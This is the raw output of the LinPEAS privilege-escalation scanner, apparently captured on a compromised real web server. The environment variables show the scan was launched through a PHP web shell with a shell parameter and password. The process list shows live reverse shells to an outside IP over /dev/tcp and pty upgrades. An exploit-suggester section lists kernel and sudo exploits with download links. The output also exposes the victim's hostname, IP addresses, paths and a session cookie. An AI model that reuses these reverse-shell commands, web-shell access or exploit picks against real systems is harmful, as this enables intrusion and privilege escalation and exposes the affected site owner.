LinPEAS-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html

LEGEND:
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
  LightMagenta: Your username

Starting LinPEAS. Caching Writable Folders...
╔═══════════════════╗ ═══════════════════════════════╣ Basic information ╠═══════════════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• OS: Linux version 3.10.0-957.27.2.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-36) (GCC) ) #1 SMP Mon Jul 29 17:46:05 UTC 2019 User & Groups: uid=99(nobody) gid=99(nobody) groups=99(nobody) Hostname: ns1.miisky.com [+] /bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h) [+] /bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)  Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE   ╔════════════════════╗ ══════════════════════════════╣ System Information ╠══════════════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• ╔══════════╣ Operative system β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits Linux version 3.10.0-957.27.2.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-36) (GCC) ) #1 SMP Mon Jul 29 17:46:05 UTC 2019 lsb_release Not Found  ╔══════════╣ Sudo version β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version Sudo version 1.8.23 ╔══════════╣ PATH β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses /usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin ╔══════════╣ Date & uptime Fri May 23 17:17:39 IST 2025 17:17:39 up 14:16, 0 users, load average: 6.56, 4.77, 2.62 ╔══════════╣ Unmounted file-system? 
β•š Check if you can mount umounted devices  /dev/mapper/centos-root / xfs defaults,uquota 0 0 UUID=ae129d83-91e0-47f1-a057-ca7bfb81709a /boot xfs defaults 0 0 /dev/mapper/centos-swap swap swap defaults 0 0 /usr/tmpDSK /tmp ext3 defaults,noauto 0 0 /tmp /var/tmp ext3 defaults,bind,noauto 0 0 ╔══════════╣ Any sd*/disk* disk in /dev? (limit 20) disk ╔══════════╣ Environment β•š Any private information inside environment variables? SERVER_SIGNATURE= HTTP_X_HTTPS=1 ORIG_PATH_TRANSLATED=/home/miisky/public_html/food_order_admin/img/406.php SSL_TLS_SNI=www.miisky.com HTTP_SEC_FETCH_DEST=empty UNIQUE_ID=aDBgGVaL-pmdRelAZNNXdwAAAAw REDIRECT_SCRIPT_URL=/food_order_admin/img/406.php HTTP_USER_AGENT=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 REDIRECT_SCRIPT_URI=https://www.miisky.com/food_order_admin/img/406.php HTTP_HOST=www.miisky.com HTTP_ORIGIN=https://www.miisky.com SERVER_PORT=443 REDIRECT_HANDLER=application/x-httpd-ea-php56 DOCUMENT_ROOT=/home/miisky/public_html HTTPS=on SCRIPT_FILENAME=/home/miisky/public_html/food_order_admin/img/406.php REQUEST_URI=/food_order_admin/img/406.php?feature=shell&code=india1947 SCRIPT_NAME=/food_order_admin/img/406.php SCRIPT_URI=https://www.miisky.com/food_order_admin/img/406.php HTTP_CONNECTION=keep-alive REMOTE_PORT=56684 PATH=/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin ORIG_SCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/ea-php56 SCRIPT_URL=/food_order_admin/img/406.php CONTEXT_PREFIX=/cgi-sys SERVER_ADMIN=webmaster@miisky.com PWD=/home/miisky/public_html/food_order_admin/img/new REDIRECT_UNIQUE_ID=aDBgGVaL-pmdRelAZNNXdwAAAAw REQUEST_SCHEME=https REDIRECT_SSL_TLS_SNI=www.miisky.com REDIRECT_STATUS=200 TZ=Asia/Kolkata REDIRECT_HTTPS=on REDIRECT_QUERY_STRING=feature=shell&code=india1947 HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5 
HTTP_REFERER=https://www.miisky.com/food_order_admin/img/406.php?code=india1947 HTTP_ACCEPT=*/* HTTP_DNT=1 HTTP_PRIORITY=u=0 ORIG_SCRIPT_NAME=/cgi-sys/ea-php56 REMOTE_ADDR=103.108.174.25 SERVER_NAME=www.miisky.com SHLVL=2 CONTENT_LENGTH=100 HTTP_SEC_FETCH_MODE=cors SERVER_SOFTWARE=Apache QUERY_STRING=feature=shell&code=india1947 SERVER_ADDR=45.127.102.254 GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.1 HTTP_ACCEPT_ENCODING=gzip, deflate, br, zstd CONTENT_TYPE=application/x-www-form-urlencoded REDIRECT_URL=/food_order_admin/img/406.php HTTP_SEC_GPC=1 HTTP_SEC_FETCH_SITE=same-origin HTTP_COOKIE=PHPSESSID=f1fru1miu2ljoi9vrgqeli7ci2 REQUEST_METHOD=POST CONTEXT_DOCUMENT_ROOT=/usr/local/cpanel/cgi-sys/ ORIG_PATH_INFO=/food_order_admin/img/406.php _=/bin/env ╔══════════╣ Searching Signature verification failed in dmesg β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed dmesg Not Found  ╔══════════╣ Executing Linux Exploit Suggester β•š https://github.com/mzet-/linux-exploit-suggester cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe [+] [CVE-2016-5195] dirtycow Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},[ RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7} ],ubuntu=16.04|14.04|12.04 Download URL: https://www.exploit-db.com/download/40611 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh [+] [CVE-2016-5195] dirtycow 2 Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,[ RHEL=5|6|7 
],ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} Download URL: https://www.exploit-db.com/download/40839 ext-url: https://www.exploit-db.com/download/40847 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh [+] [CVE-2017-1000253] PIE_stack_corruption Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt Exposure: probable Tags: RHEL=6,[ RHEL=7 ]{kernel:3.10.0-514.21.2|3.10.0-514.26.1} Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c [+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET) Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/ https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/ Exposure: less probable Tags: ubuntu=(22.04){kernel:5.15.0-27-generic} Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) [+] [CVE-2021-4034] PwnKit Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Exposure: less probable Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main [+] [CVE-2021-3156] sudo Baron Samedit Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: less probable Tags: mint=19,ubuntu=18|20, debian=10 Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [+] [CVE-2021-3156] sudo Baron Samedit 2 Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: less probable Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10 Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main [+] [CVE-2021-22555] 
Netfilter heap out-of-bounds write Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html Exposure: less probable Tags: ubuntu=20.04{kernel:5.8.0-*} Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c Comments: ip_tables kernel module must be loaded [+] [CVE-2019-18634] sudo pwfeedback Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/ Exposure: less probable Tags: mint=19 Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c Comments: sudo configuration requires pwfeedback to be enabled. [+] [CVE-2019-15666] XFRM_UAF Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc Exposure: less probable Download URL: Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled [+] [CVE-2018-1000001] RationalLove Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ Exposure: less probable Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9} Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c Comments: kernel.unprivileged_userns_clone=1 required [+] [CVE-2017-7308] af_packet Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html Exposure: less probable Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic} Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. 
Modified version at 'ext-url' adds support for additional kernels [+] [CVE-2017-6074] dccp Details: http://www.openwall.com/lists/oss-security/2017/02/22/3 Exposure: less probable Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic} Download URL: https://www.exploit-db.com/download/41458 Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass [+] [CVE-2017-5618] setuid screen v4.5.0 LPE Details: https://seclists.org/oss-sec/2017/q1/184 Exposure: less probable Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154 [+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64 Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt Exposure: less probable Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611 Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c Comments: Uses "Stack Clash" technique, works against most SUID-root binaries [+] [CVE-2016-2384] usb-midi Details: https://xairy.github.io/blog/2016/cve-2016-2384 Exposure: less probable Tags: ubuntu=14.04,fedora=22 Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user [+] [CVE-2015-9322] BadIRET Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/ Exposure: less probable Tags: RHEL<=7,fedora=20 Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz [+] [CVE-2015-8660] overlayfs (ovl_setattr) Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/ Exposure: less probable Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic} Download URL: https://www.exploit-db.com/download/39166 [+] [CVE-2015-8660] overlayfs (ovl_setattr) Details: 
http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/ Exposure: less probable Download URL: https://www.exploit-db.com/download/39230 [+] [CVE-2015-3246] userhelper Details: https://www.qualys.com/2015/07/23/cve-2015-3245-cve-2015-3246/cve-2015-3245-cve-2015-3246.txt Exposure: less probable Tags: RHEL=6{libuser:0.56.13-(4|5).el6},RHEL=6{libuser:0.60-5.el7},fedora=13|19|20|21|22 Download URL: https://www.exploit-db.com/download/37706 Comments: RHEL 5 is also vulnerable, but installed version of glibc (2.5) lacks functions needed by roothelper.c [+] [CVE-2014-5207] fuse_suid Details: https://www.exploit-db.com/exploits/34923/ Exposure: less probable Download URL: https://www.exploit-db.com/download/34923 [+] [CVE-2014-4014] inode_capable Details: http://www.openwall.com/lists/oss-security/2014/06/10/4 Exposure: less probable Tags: ubuntu=12.04 Download URL: https://www.exploit-db.com/download/33824 [+] [CVE-2014-0196] rawmodePTY Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html Exposure: less probable Download URL: https://www.exploit-db.com/download/33516 [+] [CVE-2016-0728] keyring Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ Exposure: less probable Download URL: https://www.exploit-db.com/download/40003 Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working ╔══════════╣ Protections ═╣ AppArmor enabled? .............. AppArmor Not Found ═╣ AppArmor profile? .............. unconfined ═╣ is linuxONE? ................... s390x Not Found ═╣ grsecurity present? ............ grsecurity Not Found ═╣ PaX bins present? .............. PaX Not Found ═╣ Execshield enabled? ............ # Set kernel.exec-shield to 1 per security requirements kernel.exec-shield = 1 ═╣ SELinux enabled? ............... 
SELinux status: disabled ═╣ Seccomp enabled? ............... disabled ═╣ User namespace? ................ enabled ═╣ Cgroup2 enabled? ............... disabled ═╣ Is ASLR enabled? ............... Yes ═╣ Printer? ....................... No ═╣ Is this a virtual machine? ..... Yes (xen)  ╔═══════════╗ ═══════════════════════════════════╣ Container ╠═══════════════════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β• ╔══════════╣ Container related tools present (if any): ╔══════════╣ Container details ═╣ Is this a container? ........... No ═╣ Any running containers? ........ No   ╔═══════╗ ═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════  β•šβ•β•β•β•β•β•β•β• Learn and practice cloud hacking techniques in training.hacktricks.xyz  ═╣ GCP Virtual Machine? ................. No ═╣ GCP Cloud Funtion? ................... No ═╣ AWS ECS? ............................. No ═╣ AWS EC2? ............................. No ═╣ AWS EC2 Beanstalk? ................... No ═╣ AWS Lambda? .......................... No ═╣ AWS Codebuild? ....................... No ═╣ DO Droplet? .......................... No ═╣ IBM Cloud VM? ........................ No ═╣ Azure VM or Az metadata? ............. No ═╣ Azure APP or IDENTITY_ENDPOINT? ...... No ═╣ Azure Automation Account? ............ No ═╣ Aliyun ECS? .......................... No ═╣ Tencent CVM? ......................... No   ╔════════════════════════════════════════════════╗ ════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• ╔══════════╣ Running processes (cleaned) β•š Check weird & unexpected proceses run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes root 1 0.0 0.0 52028 3600 ? 
Ss 03:01 0:45 /usr/lib/systemd/systemd --switched-root --system --deserialize 22 root 574 0.0 0.1 39252 7272 ? Ss 03:01 0:03 /usr/lib/systemd/systemd-journald root 595 0.0 0.0 272288 1228 ? Ss 03:01 0:02 /usr/sbin/lvmetad -f root 601 0.0 0.0 44620 1308 ? Ss 03:01 0:00 /usr/lib/systemd/systemd-udevd root 846 0.0 0.0 55520 536 ? S pea.txt 2>&1 nobody 64135 0.2 0.0 14628 4544 ? S 17:14 0:00 | _ /bin/sh ./linpeas.sh nobody 13640 1.5 0.0 14628 3728 ? S 17:18 0:00 | _ /bin/sh ./linpeas.sh nobody 49485 0.0 0.1 204716 7484 ? S 16:29 0:02 _ /usr/sbin/httpd -k start nobody 32278 0.0 0.1 204712 7388 ? S 16:49 0:00 _ /usr/sbin/httpd -k start nobody 6739 0.0 0.2 213932 14016 ? S 17:16 0:00 | _ /opt/cpanel/ea-php56/root/usr/bin/php-cgi nobody 6745 0.0 0.0 11680 1396 ? S 17:16 0:00 | _ sh -c ./linpeas.sh > pea.txt 2>&1 nobody 6748 0.2 0.0 13592 3456 ? S 17:16 0:00 | _ /bin/sh ./linpeas.sh nobody 18393 0.0 0.0 13592 2448 ? S 17:18 0:00 | _ /bin/sh ./linpeas.sh nobody 18399 0.0 0.0 51864 1872 ? R 17:18 0:00 | | _ ps fauxwww nobody 18396 0.0 0.0 13592 2240 ? S 17:18 0:00 | _ /bin/sh ./linpeas.sh nobody 62631 0.0 0.1 204736 7372 ? S 17:03 0:00 _ /usr/sbin/httpd -k start nobody 63024 0.0 0.1 204840 7424 ? S 17:05 0:00 _ /usr/sbin/httpd -k start nobody 63228 0.0 0.1 204712 6832 ? S 17:06 0:00 _ /usr/sbin/httpd -k start nobody 63727 0.0 0.1 204576 7004 ? S 17:10 0:00 _ /usr/sbin/httpd -k start nobody 63797 0.0 0.2 213932 14052 ? S 17:11 0:00 | _ /opt/cpanel/ea-php56/root/usr/bin/php-cgi nobody 63798 0.0 0.0 11680 1392 ? S 17:11 0:00 | _ sh -c sh -i 5<> /dev/tcp/51.79.165.150/8449 0<&5 1>&5 2>&5 nobody 63799 0.0 0.0 11816 1716 ? S 17:11 0:00 | _ sh -i nobody 63815 0.0 0.0 26056 4804 ? S 17:11 0:00 | _ python -c import pty;pty.spawn("/bin/bash") nobody 63816 0.0 0.0 11816 1712 pts/1 Ss+ 17:11 0:00 | _ /bin/bash nobody 64022 0.0 0.1 204576 7204 ? S 17:13 0:00 _ /usr/sbin/httpd -k start nobody 64023 0.0 0.1 204712 7304 ? 
S 17:13 0:00 _ /usr/sbin/httpd -k start nobody 64129 0.0 0.1 204712 6748 ? S 17:14 0:00 _ /usr/sbin/httpd -k start nobody 64131 0.0 0.1 204720 7272 ? S 17:14 0:00 _ /usr/sbin/httpd -k start nobody 64132 0.0 0.1 204712 7552 ? R 17:14 0:00 _ /usr/sbin/httpd -k start nobody 18148 1.6 0.2 213672 13432 ? S 17:18 0:00 | _ /opt/cpanel/ea-php56/root/usr/bin/php-cgi nobody 5261 0.0 0.1 204576 6476 ? S 17:16 0:00 _ /usr/sbin/httpd -k start nobody 5838 0.0 0.1 204576 7104 ? S 17:16 0:00 _ /usr/sbin/httpd -k start nobody 5887 0.0 0.1 204576 7168 ? S 17:16 0:00 _ /usr/sbin/httpd -k start nobody 5979 0.0 0.0 204444 5808 ? S 17:16 0:00 _ /usr/sbin/httpd -k start nobody 5980 0.0 0.1 204576 7088 ? S 17:16 0:00 _ /usr/sbin/httpd -k start nobody 6652 0.0 0.1 206748 7384 ? S 17:16 0:00 _ /usr/sbin/httpd -k start nobody 11911 0.0 0.1 204576 6596 ? S 17:17 0:00 _ /usr/sbin/httpd -k start root 2134 0.0 0.0 53004 2448 ? Ss 03:01 0:01 /usr/sbin/dovecot -F -c /etc/dovecot/dovecot.conf dovenull 2138 0.0 0.0 46876 3956 ? S 03:01 0:00 _ dovecot/pop3-login dovenull 2139 0.0 0.0 46888 4476 ? S 03:01 0:00 _ dovecot/imap-login dovecot 2140 0.0 0.0 10316 1328 ? S 03:01 0:00 _ dovecot/anvil root 2141 0.0 0.0 10448 1512 ? S 03:01 0:00 _ dovecot/log dovenull 2142 0.0 0.0 46876 3952 ? S 03:01 0:00 _ dovecot/pop3-login dovenull 2143 0.0 0.0 46888 4480 ? S 03:01 0:00 _ dovecot/imap-login root 2144 0.0 0.0 17820 3540 ? S 03:01 0:00 _ dovecot/config dovecot 2145 0.0 0.0 13564 1524 ? S 03:01 0:00 _ dovecot/stats dovecot 63960 0.0 0.0 41068 3032 ? S 17:12 0:00 _ dovecot/auth root 13342 0.0 0.0 41068 2852 ? S 17:18 0:00 _ dovecot/auth -w rpc 5339 0.0 0.0 69264 1536 ? Ss 04:04 0:00 /sbin/rpcbind -w nobody 62353 0.0 0.0 11680 1392 ? S 17:01 0:00 sh -c sh -i 5<> /dev/tcp/51.79.165.150/8449 0<&5 1>&5 2>&5 nobody 62354 0.0 0.0 11816 1716 ? S 17:01 0:00 _ sh -i nobody 62634 0.0 0.0 26056 4804 ? 
S 17:03 0:00 _ python -c import pty;pty.spawn("/bin/bash") nobody 62635 0.0 0.0 11820 1752 pts/0 Ss 17:03 0:00 _ /bin/bash nobody 63720 167 0.0 10612 396 pts/0 Sl+ 17:10 14:24 _ ./d new.txt test root 13531 0.0 0.1 350396 6728 ? Sl 17:18 0:00 /usr/sbin/abrt-dbus -t133 root 15634 0.0 0.0 151292 3628 ? Ssl 17:18 0:00 /usr/libexec/fprintd ╔══════════╣ Processes with credentials in memory (root req) β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 process found (dump creds from memory as root) sshd Not Found  ╔══════════╣ Processes whose PPID belongs to a different user (not root) β•š You will know if a user can somehow spawn processes as a different user  ╔══════════╣ Files opened by processes belonging to other users β•š This is usually empty because of the lack of privileges to read other user processes information COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME ╔══════════╣ Systemd PATH β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin ╔══════════╣ Cron jobs β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs /usr/local/bin/crontab incrontab Not Found -rw-------  1 root root    8 Mar 14 11:28 /etc/cron.allow -rw-------. 1 root root  232 Feb  6  2017 /etc/cron.deny -rw-r--r--  1 root root  451 Jun 10  2014 /etc/crontab  /etc/cron.d: total 48 drwxr-xr-x.   2 root root  4096 Apr 22 21:04 . drwxr-xr-x. 121 root root 12288 May 23 17:10 .. 
-rw-r--r--    1 root root   128 Nov 20  2018 0hourly -rw-r-----    1 root root   269 Jul 15  2019 cpanel-dovecot-solr -rw-------    1 root root    58 Dec 20  2017 cpanel_autossl -rw-r--r--    1 root root  2257 Aug 24  2024 mailman -rw-r--r--    1 root root   108 Oct 30  2018 raid-check -rw-------    1 root root   235 Jul 29  2019 sysstat -rw-r--r--    1 root root   881 May 18 02:47 wp-toolkit-update  /etc/cron.daily: total 40 drwxr-xr-x.   2 root root   107 Aug  6  2019 . drwxr-xr-x. 121 root root 12288 May 23 17:10 .. -rwxr-xr-x    1 root root   332 Nov  5  2018 0yum-daily.cron -rwxr-xr-x.   1 root root  2239 Jun 10  2014 certwatch -rwx------    1 root root   258 Aug 14  2017 logrotate -rwxr-xr-x    1 root root   618 Oct 30  2018 man-db.cron -rwx------    1 root root   208 Apr 11  2018 mlocate -rwxr-xr-x    1 root root    60 Feb  3  2017 tmpwatch  /etc/cron.hourly: total 28 drwxr-xr-x.   2 root root    55 Aug  6  2019 . drwxr-xr-x. 121 root root 12288 May 23 17:10 .. -rwxr-xr-x    1 root root   392 Nov 20  2018 0anacron -rwxr-xr-x    1 root root   362 Nov  5  2018 0yum-hourly.cron -rwxr-xr-x    1 root root   149 Feb 27  2017 iops  /etc/cron.monthly: total 16 drwxr-xr-x.   2 root root     6 Jun 10  2014 . drwxr-xr-x. 121 root root 12288 May 23 17:10 ..  /etc/cron.weekly: total 16 drwxr-xr-x.   2 root root     6 Jun 10  2014 . drwxr-xr-x. 121 root root 12288 May 23 17:10 ..  /var/spool/anacron: total 16 drwxr-xr-x.  2 root root   60 Nov 20  2018 . drwxr-xr-x. 14 root root 4096 Aug 14  2017 .. -rw-------.  1 root root    9 May 23 04:16 cron.daily -rw-------.  1 root root    9 May 10 05:30 cron.monthly -rw-------.  
1 root root    9 May 19 04:51 cron.weekly SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root bin daemon adm lp sync shutdown halt mail operator games ftp nobody avahi-autoipd dbus abrt apache polkitd libstoragemgmt tss postfix sshd chrony ntp tcpdump ctrl4c nagios ctrlsadmin systemd-bus-proxy systemd-network clamupdate ╔══════════╣ System timers β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers NEXT LEFT LAST PASSED UNIT ACTIVATES Sat 2025-05-24 03:16:22 IST 9h left Fri 2025-05-23 03:16:22 IST 14h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service n/a n/a n/a n/a systemd-readahead-done.timer systemd-readahead-done.service ╔══════════╣ Analyzing .timer files β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers  ╔══════════╣ Analyzing .service files β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services /etc/systemd/system/multi-user.target.wants/abrt-oops.service could be executing some relative path /etc/systemd/system/multi-user.target.wants/abrt-xorg.service could be executing some relative path /etc/systemd/system/multi-user.target.wants/named.service could be executing some relative path You can't write on systemd PATH ╔══════════╣ Analyzing .socket files β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets /usr/lib/systemd/system/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket /usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket /usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: 
/dev/log /usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /dev/log ╔══════════╣ Unix Sockets Listening β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets sed: -e expression #1, char 0: no previous regular expression /dev/log └─(Read Write) /run/cphulkd.sock /run/cphulkd_db.sock └─(Read ) /run/dbus/system_bus_socket └─(Read Write) /run/dovecot/anvil /run/dovecot/anvil-auth-penalty /run/dovecot/auth-client └─(Read Write) /run/dovecot/auth-login /run/dovecot/auth-master /run/dovecot/auth-userdb └─(Read Write) /run/dovecot/auth-worker /run/dovecot/config /run/dovecot/dict /run/dovecot/dict-async /run/dovecot/director-admin /run/dovecot/dns-client └─(Read Write) /run/dovecot/doveadm-server /run/dovecot/imap-hibernate /run/dovecot/imap-master /run/dovecot/imap-urlauth └─(Read Write) /run/dovecot/imap-urlauth-worker /run/dovecot/indexer └─(Read Write) /run/dovecot/indexer-worker /run/dovecot/ipc /run/dovecot/lmtp /run/dovecot/log-errors /run/dovecot/master /run/dovecot/old-stats /run/dovecot/quota-status └─(Read Write) /run/dovecot/replication-notify /run/dovecot/replicator /run/dovecot/stats-reader /run/dovecot/stats-writer └─(Read Write) /run/ftpd.sock /run/gssproxy.sock └─(Read Write) /run/lsm/ipc/sim └─(Read Write) /run/lsm/ipc/simc └─(Read Write) /run/lvm/lvmetad.socket /run/lvm/lvmpolld.socket /run/rpcbind.sock └─(Read Write) /run/sw-engine.sock /run/systemd/cgroups-agent /run/systemd/journal/socket └─(Read Write) /run/systemd/journal/stdout └─(Read Write) /run/systemd/notify └─(Read Write) /run/systemd/private └─(Read Write) /run/systemd/shutdownd /run/udev/control /usr/local/cpanel/var/cpauthd.sock └─(Read Write) /usr/local/cpanel/var/cpdoveauth_domainownerd.sock 
